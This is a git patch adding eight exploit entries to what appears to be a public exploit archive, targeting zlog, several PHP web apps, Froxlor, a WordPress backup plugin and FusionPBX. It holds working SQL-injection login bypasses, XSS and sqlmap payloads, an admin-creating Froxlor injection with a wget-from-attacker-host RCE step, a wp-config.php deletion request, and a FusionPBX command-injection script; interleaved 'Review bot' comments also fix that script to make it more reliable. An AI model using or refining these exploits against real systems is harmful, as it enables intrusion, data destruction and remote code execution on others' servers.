From d8eefee2c74abbe4aca8cb94cd22045e31b391b7 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 9 Nov 2021 05:02:09 +0000 Subject: [PATCH] DB: 2021-11-09 8 changes to exploits/shellcodes zlog 1.2.15 - Buffer Overflow Simple Client Management System 1.0 - SQLi (Authentication Bypass) Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS) Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated) Money Transfer Management System 1.0 - Authentication Bypass Froxlor 0.10.29.1 - SQL Injection (Authenticated) WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated) --- exploits/multiple/local/50504.c | 48 ++++++++++ exploits/php/webapps/50497.txt | 48 ++++++++++ exploits/php/webapps/50498.txt | 163 ++++++++++++++++++++++++++++++++ exploits/php/webapps/50499.txt | 37 ++++++++ exploits/php/webapps/50501.txt | 28 ++++++ exploits/php/webapps/50502.txt | 91 ++++++++++++++++++ exploits/php/webapps/50503.txt | 57 +++++++++++ exploits/php/webapps/50505.py | 56 +++++++++++ files_exploits.csv | 8 ++ 9 files changed, 536 insertions(+) create mode 100644 exploits/multiple/local/50504.c create mode 100644 exploits/php/webapps/50497.txt create mode 100644 exploits/php/webapps/50498.txt create mode 100644 exploits/php/webapps/50499.txt create mode 100644 exploits/php/webapps/50501.txt create mode 100644 exploits/php/webapps/50502.txt create mode 100644 exploits/php/webapps/50503.txt create mode 100755 exploits/php/webapps/50505.py diff --git a/exploits/multiple/local/50504.c b/exploits/multiple/local/50504.c new file mode 100644 index 000000000..26ead6856 --- /dev/null +++ b/exploits/multiple/local/50504.c 
@@ -0,0 +1,48 @@ +# Exploit Title: zlog 1.2.15 - Buffer Overflow +# Date: 10/23/2021 +# Exploit Author: LIWEI +# Vendor Homepage: https://github.com/HardySimpson/zlog +# Software Link: https://github.com/HardySimpson/zlog +# Version: v1.2.15 +# Tested on: ubuntu 18.04.2 +# 1.- compile the zlogv1.2.15 code to a library. +# 2.- Use the "zlog_init" API to parse a file. You can do it as my testcase below. +# 3.- crash. because it made a stack-buffer-overflow READ. +# 4. -Also, you can get a stack-buffer-overflow WRITE when the pointer's address which overflow read is end with "0x20". +# 5.- Here are the crash backtrace. +#0 0x5588c3 in zlog_conf_build_with_file /src/zlog/src/conf.c:308:15 +#1 0x557ad6 in zlog_conf_new /src/zlog/src/conf.c:176:7 +#2 0x551183 in zlog_init_inner /src/zlog/src/zlog.c:91:18 +#3 0x551008 in zlog_init /src/zlog/src/zlog.c:134:6 +#4 0x550df1 in LLVMFuzzerTestOneInput /src/zlog_init_fuzzer.c:18:18 + +And also my testcase: +#include +#include +#include +#include "zlog.h" + +int +LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) +{ + char filename[256]; + sprintf(filename, "/tmp/libfuzzer.%d", getpid()); + + FILE *fp = fopen(filename, "wb"); + if (!fp) + return 0; + fwrite(data, size, 1, fp); + fclose(fp); + + int rc = zlog_init(filename); + if (rc == 0) + { + zlog_fini(); + } + unlink(filename); + remove(filename); + return 0; +} + +Put my testcase in his project and change the compile line with CC="clang" CFLAGS="-O1 -fno-omit-frame-pointer -gline-tables-only -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link" CXX="clang++" CXXFLAGS="-O1 -fno-omit-frame-pointer -gline-tables-only -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link -stdlib=libc++" +Use ./configure under his project as shown in his README.txt. you will get a binary as testcase's name. run and you will reproduce it. 
\ No newline at end of file diff --git a/exploits/php/webapps/50497.txt b/exploits/php/webapps/50497.txt new file mode 100644 index 000000000..3275784b2 --- /dev/null +++ b/exploits/php/webapps/50497.txt @@ -0,0 +1,48 @@ +# Exploit Title: Simple Client Management System 1.0 - SQLi (Authentication Bypass) +# Exploit Author: Sentinal920 +# Date: 5-11-2021 +# Category: Web application +# Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip +# Version: 1.0 +# Tested on: Kali Linux +# Vulnerable page: Login +# Vulnerable Parameter: "password" + + +Technical description: +An SQL Injection vulnerability exists in the Simple Client Management +System. An attacker can leverage the vulnerable "password" parameter +in the "Login.php" web page to authenticate as an admin user. + +Steps to exploit: +1) Navigate to http://localhost/cms/admin/login.php +2) Set username as admin and insert your payload in the password parameter + +Proof of concept (Poc): +The following payload inside password will allow you to login into the +web server as admin +admin'or'1'%3D'1 + +--- + +POST /cms/classes/Login.php?f=login HTTP/1.1 +Host: localhost +Content-Length: 51 +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/cms/admin/login.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn +Connection: close + +username=admin'or'1'%3D'1&password=admin'or'1'%3D'1 + +--- \ No newline at end of file diff --git a/exploits/php/webapps/50498.txt b/exploits/php/webapps/50498.txt new file mode 100644 index 000000000..c1bdb78d7 --- /dev/null +++ b/exploits/php/webapps/50498.txt 
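Review bot: The four `#include` directives at the top of the harness carry no header name (`#include` followed by nothing, then `#include "zlog.h"`), so the testcase as printed does not compile; presumably the angle-bracket names were lost when the file was rendered and should read `#include <stdio.h>`, `#include <stdint.h>`, `#include <unistd.h>` (for `sprintf`/`fopen`, `uint8_t`/`size_t`, `getpid`/`unlink`). The `fwrite` return is unchecked, `unlink` followed by `remove` on the same path is redundant, and `snprintf(filename, sizeof filename, "/tmp/libfuzzer.%d", getpid())` is the bounded form of the path build. For readers the advisory also never states the trust boundary: the crash is in `zlog_conf_build_with_file` while parsing the file handed to `zlog_init`, so it is exploitable only where that configuration is attacker-controlled, and a one-line impact statement to that effect (plus an explanation of what "pointer's address ends with 0x20" refers to for the WRITE variant) would make the entry far more useful.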
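Review bot: The steps say to set the username to `admin` and put the payload only in the password field, but the captured request sends `admin'or'1'%3D'1` in both `username` and `password`, and the endpoint actually posted to is `/cms/classes/Login.php?f=login` rather than the `admin/login.php` page named in step 1; the two descriptions should agree, e.g. `2) POST to /cms/classes/Login.php?f=login with username=admin and password=admin'or'1'%3D'1`. Note also that an `'or'1'='1` predicate normally matches every row, so which account the session lands in depends on the query's row order rather than being guaranteed to be `admin` — worth confirming against the login query before claiming admin access specifically.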
@@ -0,0 +1,163 @@ +# Exploit Title: Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS) +# Exploit Author: Sentinal920 +# Date: 5-11-2021 +# Category: Web application +# Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip +# Version: 1.0 +# Tested on: Kali Linux +# Vulnerable page: client,invoice +# Vulnerable Parameters: "lastname", "remarks" + +Technical description: +A stored XSS vulnerability exists in the Simple Client Management +System. An attacker can leverage this vulnerability in order to run +javascript on the web server surfers behalf, which can lead to cookie +stealing, defacement and more. + +Steps to exploit: +1) Navigate to http://localhost/cms/admin/?page=client +2) Click on add new client +3) Insert your payload in the "lastname" parameter or the "description" parameter +4) Click save + +Proof of concept (Poc): +The following payload will allow you to run the javascript - + + + + +1) XSS POC in Add New Client +----------------------------- + +POST /cms/classes/Master.php?f=save_client HTTP/1.1 +Host: localhost +Content-Length: 1026 +sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99" +Accept: application/json, text/javascript, */*; q=0.01 +Content-Type: multipart/form-data; +boundary=----WebKitFormBoundaryIBW1SfSFiXMKK7Nt +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 +Safari/537.36 +sec-ch-ua-platform: "Windows" +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/cms/admin/?page=client/manage_client +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn +Connection: close + + 
+------WebKitFormBoundaryIBW1SfSFiXMKK7Nt +Content-Disposition: form-data; name="lastname" + + +------WebKitFormBoundaryIBW1SfSFiXMKK7Nt +Content-Disposition: form-data; name="firstname" + +anything +------WebKitFormBoundaryIBW1SfSFiXMKK7Nt +Content-Disposition: form-data; name="middlename" + +anything +------WebKitFormBoundaryIBW1SfSFiXMKK7Nt +Content-Disposition: form-data; name="gender" + +Male +------WebKitFormBoundaryIBW1SfSFiXMKK7Nt +Content-Disposition: form-data; name="dob" + +2021-11-03 +------WebKitFormBoundaryIBW1SfSFiXMKK7Nt +Content-Disposition: form-data; name="contact" + +xxxxxxxxxx +------WebKitFormBoundaryIBW1SfSFiXMKK7Nt +Content-Disposition: form-data; name="address" + +xxxxxx +------WebKitFormBoundaryIBW1SfSFiXMKK7Nt +Content-Disposition: form-data; name="email" +xxxx@xxx.com +------WebKitFormBoundaryIBW1SfSFiXMKK7Nt +Content-Disposition: form-data; name="avatar"; filename="" +Content-Type: application/octet-stream + + +------WebKitFormBoundaryIBW1SfSFiXMKK7Nt-- + + + +2) XSS POC in Add New Invoice +----------------------------- + +POST /cms/classes/Master.php?f=save_invoice HTTP/1.1 +Host: localhost +Content-Length: 1032 +sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99" +Accept: application/json, text/javascript, */*; q=0.01 +Content-Type: multipart/form-data; +boundary=----WebKitFormBoundaryEk0iOWhhoA0lApXo +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 +Safari/537.36 +sec-ch-ua-platform: "Windows" +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/cms/admin/?page=invoice/manage_invoice +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn +Connection: close + +------WebKitFormBoundaryEk0iOWhhoA0lApXo +Content-Disposition: form-data; name="id" + + +------WebKitFormBoundaryEk0iOWhhoA0lApXo 
+Content-Disposition: form-data; name="client_id" + +1 +------WebKitFormBoundaryEk0iOWhhoA0lApXo +Content-Disposition: form-data; name="service_id[]" + +1 +------WebKitFormBoundaryEk0iOWhhoA0lApXo +Content-Disposition: form-data; name="price[]" + +250 +------WebKitFormBoundaryEk0iOWhhoA0lApXo +Content-Disposition: form-data; name="discount_perc" + +0 +------WebKitFormBoundaryEk0iOWhhoA0lApXo +Content-Disposition: form-data; name="discount" + +0 +------WebKitFormBoundaryEk0iOWhhoA0lApXo +Content-Disposition: form-data; name="tax_perc" + +0 +------WebKitFormBoundaryEk0iOWhhoA0lApXo +Content-Disposition: form-data; name="tax" + +0 +------WebKitFormBoundaryEk0iOWhhoA0lApXo +Content-Disposition: form-data; name="total_amount" + +250 +------WebKitFormBoundaryEk0iOWhhoA0lApXo +Content-Disposition: form-data; name="remarks" + + +------WebKitFormBoundaryEk0iOWhhoA0lApXo-- \ No newline at end of file diff --git a/exploits/php/webapps/50499.txt b/exploits/php/webapps/50499.txt new file mode 100644 index 000000000..c7d2d6b93 --- /dev/null +++ b/exploits/php/webapps/50499.txt 
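Review bot: The proof-of-concept never shows the payload: "The following payload will allow you to run the javascript -" is followed by nothing, and the `lastname` and `remarks` form-data parts in both requests are empty, so a reader cannot reproduce it; presumably the script tag was stripped when the file was rendered and should be restored. Step 3 refers to a `"description"` parameter while the header lists `"remarks"`; the invoice request confirms `remarks`, so the step should say that. Both requests carry an admin `PHPSESSID` and are issued from `/cms/admin/` pages, so this appears to be an authenticated stored XSS whose victims are other admin users — the title and impact statement should say so unless the forms are also reachable unauthenticated, which nothing here shows.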
@@ -0,0 +1,37 @@ +# Exploit Title: Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated) +# Google Dork: intitle: "Inicio de Sesión - Kmaleon" +# Date: 2021-11-05 +# Exploit Author: Amel BOUZIANE-LEBLOND +# Vendor Homepage: https://www.levelprograms.com +# Software Link: https://www.levelprograms.com/kmaleon-abogados/ +# Version: v1.1.0.205 +# Tested on: Linux + +# Description: +# The Kmaleon application from levelprogram is vulnerable to +# SQL injection via the 'tipocomb' parameter on the kmaleonW.php + +==================== 1. SQLi ==================== + +http://127.0.0.1/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=[SQLI]&isgroup=true + +The 'tipocomb' parameter is vulnerable to SQL injection. + +GET parameter 'tipocomb' is vulnerable. + +--- +Parameter: #1* (URI) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause + Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=-9144 OR 6836=6836&isgroup=true + + Type: error-based + Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 8426 FROM(SELECT COUNT(*),CONCAT(0x7176716b71,(SELECT (ELT(8426=8426,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&isgroup=true + + Type: time-based blind + Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) + Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 2738 FROM (SELECT(SLEEP(5)))EYSv)&isgroup=true +--- +[INFO] the back-end DBMS is MySQL +back-end DBMS: MySQL >= 5.0.0 \ No newline at end of file diff --git a/exploits/php/webapps/50501.txt b/exploits/php/webapps/50501.txt new file mode 100644 index 000000000..22859ba58 --- /dev/null +++ b/exploits/php/webapps/50501.txt 
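Review bot: The title marks this as authenticated, but neither the URL template nor the sqlmap payloads show the session cookie or login step a reader needs, and the payloads are given with raw spaces and parentheses (`tipocomb=-9144 OR 6836=6836`) that must be URL-encoded when sent by hand, e.g. `tipocomb=-9144%20OR%206836%3D6836`. The error-based and time-based payloads both start with `tipocomb= OR ...`, an empty value directly before `OR`, which suggests the parameter is interpolated unquoted into a numeric comparison; stating that (and the vulnerable query, if known) would be more useful than the sqlmap transcript alone. No vendor fix, CVE or disclosure timeline is given.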
@@ -0,0 +1,28 @@ +# Exploit Title: Money Transfer Management System 1.0 - Authentication Bypass +# Date: 2021-11-07 +# Exploit Author: Aryan Chehreghani +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html +# Version: 1.0 +# Tested on: Windows 10 +# Admin panel authentication bypass + +Admin panel authentication can be bypassed due to a SQL injection in the login form: + +Request: +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: http://localhost/mtms/admin/login.php +Content-Length: 37 +Cookie: PHPSESSID=8jff4m81f5j0ej125k1j9rdrc3 +Connection: keep-alive + +username='=''or'&password='=''or' + +PoC: +curl -d "username='=''or'&password='=''or'" -X POST http://localhost/mtms/admin/login.php \ No newline at end of file diff --git a/exploits/php/webapps/50502.txt b/exploits/php/webapps/50502.txt new file mode 100644 index 000000000..c986d5c93 --- /dev/null +++ b/exploits/php/webapps/50502.txt 
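Review bot: The captured request has no request line — it begins at `Host: localhost` — so the target path has to be inferred; the curl PoC posts to `/mtms/admin/login.php`, but the `X-Requested-With: XMLHttpRequest` header together with a `Referer` of that same page suggests the form may be submitted by script to a separate handler, so add the missing first line (`POST /... HTTP/1.1`) and confirm curl is hitting the same endpoint. The advisory also never names the injected parameters or shows the response that proves the bypass; a sentence such as `username and password appear to be concatenated into the login query, so '=''or' makes the WHERE clause true — verify against the source` plus the redirect or JSON returned on success would make it reproducible.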
@@ -0,0 +1,91 @@ +# Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) +# Exploit Author: Martin Cernac +# Date: 2021-11-05 +# Vendor: Froxlor (https://froxlor.org/) +# Software Link: https://froxlor.org/download.php +# Affected Version: 0.10.28, 0.10.29, 0.10.29.1 +# Patched Version: 0.10.30 +# Category: Web Application +# Tested on: Ubuntu +# CVE: 2021-42325 + +# 1. Technical Description: +# +# Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. +# +# 1.1 Pre-requisites +# - Access to a customer account +# - Ability to specify database name when creating a database +# - Feature only availible from 0.10.28 onward and must be manually enabled + + +# 2. Proof Of Concept (PoC): +# +# The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root +# +# 2.1 Privilege Escalation +# +# - Sign into Froxlor as a customer +# - View your databases +# - Create a database +# - Put your payload into the "User/Database name" field (if enabled) +# - Application will error out however your SQL query will be executed +# +# The following is a POST request example of running the payload provided, resulting in an administrator account being created +--- +POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 +Host: localhost +Content-Type: application/x-www-form-urlencoded +Content-Length: 448 + 
+s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 +--- +# +# 2.2 Remote Code Execution +# +# To achieve RCE as root: +# +# - Sign into Froxlor as the newly created admin account (payload example creds are x:a) +# - Go to System Settings +# - Go to Webserver settings +# - Adjust "Webserver reload command" field to a custom command +# - The command must not contain any of the following special characters: ;|&><`$~? +# - For details, see "safe_exec" function in lib/Froxlor/FileDir.php +# - For example commands see Payloads 4.2 section +# - Trigger configuration file rebuild +# - Use menu item "Rebuild config files" +# - Await a root cron job to execute your command + + +# 3. Vulnerable resources and parameters +# /customer_mysql.php (POST field: custom_suffix) + + +# 4. Payloads +# +# 4.1 SQL Injection payload +# The following payload creates a new Froxlor admin with full access to all customers and the server configuration +# The credentials are: +# - username: x +# - password: a +# +# `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- +# +# +# 4.2 Remote Code Execution payload +# Two part payload: +# - wget http://attacker.com/malicious.txt -O /runme.php +# - php /runme.php + + +# 5. 
Timeline +# 2021-10-11 Discovery +# 2021-10-11 Contact with developer +# 2021-10-11 Patch issued but no release rolled out +# 2021-10-12 Reserved CVE-2021-42325 +# 2021-11-05 Fix release rolled out +# 2021-11-07 Public disclosure + + +# 6. References: +# https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file diff --git a/exploits/php/webapps/50503.txt b/exploits/php/webapps/50503.txt new file mode 100644 index 000000000..41d42a598 --- /dev/null +++ b/exploits/php/webapps/50503.txt 
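Review bot: The PoC request depends on two things the walkthrough leaves implicit: the `s=fdbdf631…` value is a per-session token the reader must replace with their own, and no `Cookie` header is shown, so it is unclear whether the session is carried by `s` alone. The 4.2 payload is two commands, but the reload-command field holds one command and the forbidden-character list excludes `;` and `&`, so each command has to be set, rebuilt and awaited separately — say that in 2.2, and note that a `php` binary must exist on the host for the second step. For defenders, the injected row is a durable indicator: an unexpected entry in `panel_admins` (here loginname `x`) appearing after a customer-side "create database" error is worth adding as a detection hint.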
@@ -0,0 +1,57 @@ +# Exploit Title: WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion +# Date: 11/07/2021 +# Exploit Author: Murat DEMIRCI (@butterflyhunt3r) +# Vendor Homepage: https://www.miniorange.com/ +# Software Link: https://wordpress.org/plugins/backup-and-restore-for-wp/ +# Version: 1.0.3 +# Tested on : Windows 10 + +#Poc: + +----------------------------------REQUEST--------------------------------------- + +POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/wordpress/wp-admin/admin.php?page=mo_eb_backup_report +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 155 +Origin: http://localhost +Connection: close +Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636463166%7C9VH5dtz6rmSefsnxLUWgFNF85FReGRWg61Nhbu95sJZ%7E82178aa467cd00f9cbcce03c6157fdcbf581a715d3cdc7a6b5c940dafe58fifd; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9371ce3ee91=admin%7C1836463166%7C9VH5dtz6rmSefsnxLUZgFNF85FReGRWg61Vhau95sJZ%7C9ae26395803f7d17f75c62d98856f3249e72688d38a9d3dbb616a0e3c808c917; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1636290368 +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +action=barfw_backup_ajax_redirect&call_type=delete_backup&file_name=wp-config.php&folder_name=C%3a%5cxampp%5chtdocs%5cwordpress%5c%5c&id=5&nonce=ee90968cce + + +---------------------------------------------------------------------------------- + + + +-------------------------------RESPONSE------------------------------------------- + +HTTP/1.1 200 OK +Date: Sun, 07 Nov 2021 13:19:38 GMT +Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7 +X-Powered-By: PHP/8.0.7 
+Access-Control-Allow-Origin: http://localhost +Access-Control-Allow-Credentials: true +X-Robots-Tag: noindex +X-Content-Type-Options: nosniff +Expires: Wed, 11 Jan 1984 05:00:00 GMT +Cache-Control: no-cache, must-revalidate, max-age=0 +X-Frame-Options: SAMEORIGIN +Referrer-Policy: strict-origin-when-cross-origin +Content-Length: 9 +Connection: close +Content-Type: application/json; charset=UTF-8 + +"success" + +---------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/50505.py b/exploits/php/webapps/50505.py new file mode 100755 index 000000000..d5cf04f13 --- /dev/null +++ b/exploits/php/webapps/50505.py 
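Review bot: The request carries an admin `wordpress_logged_in_*` cookie and a `nonce` value, so this is an authenticated (apparently administrator-level) file deletion that the title and header do not mention; state the required role and whether the nonce is obtainable by lower-privileged users, since that decides the severity. The defect itself — `folder_name` accepted as an absolute path (`C:\xampp\htdocs\wordpress\`) and joined with an attacker-chosen `file_name` — deserves a description line, e.g. `the delete_backup handler does not restrict folder_name/file_name to the plugin's own backup directory`. The `"success"` body is the only evidence shown; a note that `wp-config.php` was actually removed afterwards would close the loop, and no vendor fix or CVE is referenced.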
@@ -0,0 +1,56 @@ +# Exploit Title: FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated) +# Date: 11/08/2021 +# Exploit Author: Luska +# Vendor Homepage: https://www.fusionpbx.com/ +# Software Link: https://github.com/fusionpbx/fusionpbx +# Version: < 4.5.30 +# Tested on: Debian +# CVE : CVE-2021-43405 + +#!/usr/bin/python3 +import requests +from requests_toolbelt.multipart.encoder import MultipartEncoder +import argparse + + +cookies = {'PHPSESSID': '31337'} +proxy = {'http': 'http://127.0.0.1:8080'} + +def login(url, username, password): + data = { + 'username': username, + 'password': password + } + r = requests.post(url + '/core/user_settings/user_dashboard.php', data=data, cookies=cookies) + return r.status_code + +def exploit_request(url, cmd): + print('[+] Sending Exploit Request') + mp_encoder = MultipartEncoder(fields={ 'fax_subject': '1337', 'fax_extension': f';{cmd} #', 'action': 'send', 'submit': 'send' }) + r = requests.post(url + '/app/fax/fax_send.php', cookies=cookies, headers={'Content-Type': mp_encoder.content_type}, data=mp_encoder, proxies=proxy) + return r.status_code + +def exploit(url, username, password, cmd): + if login(url,username,password) == 200: + print('[+] Login Successful') + exploit_request(url, cmd) + print('[+] Exploit Sucessful') + else: + print('[-] Login Failed') + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='[*] FusionPBX < 4.5.30 Remote Code Execution | CVE-2021-43405') + + parser.add_argument('-t', metavar='', help='Target/host URL, example: http://127.0.0.1', required=True) + parser.add_argument('-u', metavar='', help='User to login', required=True) + parser.add_argument('-p', metavar='', help='User\'s password', required=True) + parser.add_argument('-c', metavar='', help='Command to be executed', required=True) + + args = parser.parse_args() + + target = args.t + user = args.u + password = args.p + cmd = args.c + + exploit(target, user, password, cmd) \ No newline at end of file 
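Review bot: `exploit_request` passes the hard-coded `proxy = {'http': 'http://127.0.0.1:8080'}` on every call, so unless something is listening there `requests.post` raises a `ProxyError` and the exploit never fires; the proxy should be optional with a default of `None`. Login state is carried by a fixed `PHPSESSID=31337` sent before login, which only works if the server adopts a client-supplied session id (PHP `session.use_strict_mode` off) — a `requests.Session()` would carry whatever cookie the login response sets instead. `login` treats any HTTP 200 as success, which a rejected login page most likely returns as well; checking the body for a failure marker or for the authenticated dashboard is more reliable. The `#!/usr/bin/python3` shebang sits on line 10 after the header comments, so it is inert.
```python
session = requests.Session()

def login(url, username, password):
    data = {'username': username, 'password': password}
    r = session.post(url + '/core/user_settings/user_dashboard.php', data=data)
    return r.status_code

def exploit_request(url, cmd, proxies=None):
    print('[+] Sending Exploit Request')
    mp_encoder = MultipartEncoder(fields={'fax_subject': '1337', 'fax_extension': f';{cmd} #', 'action': 'send', 'submit': 'send'})
    r = session.post(url + '/app/fax/fax_send.php', headers={'Content-Type': mp_encoder.content_type}, data=mp_encoder, proxies=proxies)
    return r.status_code

# … unchanged: exploit() and the argparse entry point …
```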
diff --git a/files_exploits.csv b/files_exploits.csv
index d67a24b40..97d44682e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11412,6 +11412,7 @@ id,file,description,date,author,type,platform,port
 50472,exploits/windows/local/50472.py,"10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)",1970-01-01,ro0k,local,windows,
 50484,exploits/windows/local/50484.txt,"RDP Manager 4.9.9.3 - Denial-of-Service (PoC)",1970-01-01,Vulnerability-Lab,local,windows,
 50494,exploits/windows/local/50494.txt,"10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows,
+50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",1970-01-01,LIWEI,local,multiple,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -44596,3 +44597,10 @@ id,file,description,date,author,type,platform,port
 50493,exploits/php/webapps/50493.py,"Opencart 3 Extension TMD Vendor System - Blind SQL Injection",1970-01-01,"Muhammad Zaki Sulistya",webapps,php,
 50495,exploits/php/webapps/50495.txt,"Payment Terminal 3.1 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
 50496,exploits/multiple/webapps/50496.txt,"ImportExportTools NG 10.0.4 - HTML Injection",1970-01-01,Vulnerability-Lab,webapps,multiple,
+50497,exploits/php/webapps/50497.txt,"Simple Client Management System 1.0 - SQLi (Authentication Bypass)",1970-01-01,Sentinal920,webapps,php,
+50498,exploits/php/webapps/50498.txt,"Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,Sentinal920,webapps,php,
+50499,exploits/php/webapps/50499.txt,"Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated)",1970-01-01,"Amel BOUZIANE-LEBLOND",webapps,php,
+50501,exploits/php/webapps/50501.txt,"Money Transfer Management System 1.0 - Authentication Bypass",1970-01-01,"Aryan Chehreghani",webapps,php,
+50502,exploits/php/webapps/50502.txt,"Froxlor 0.10.29.1 - SQL Injection (Authenticated)",1970-01-01,"Martin Cernac",webapps,php,
+50503,exploits/php/webapps/50503.txt,"WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion",1970-01-01,"Murat DEMİRCİ",webapps,php,
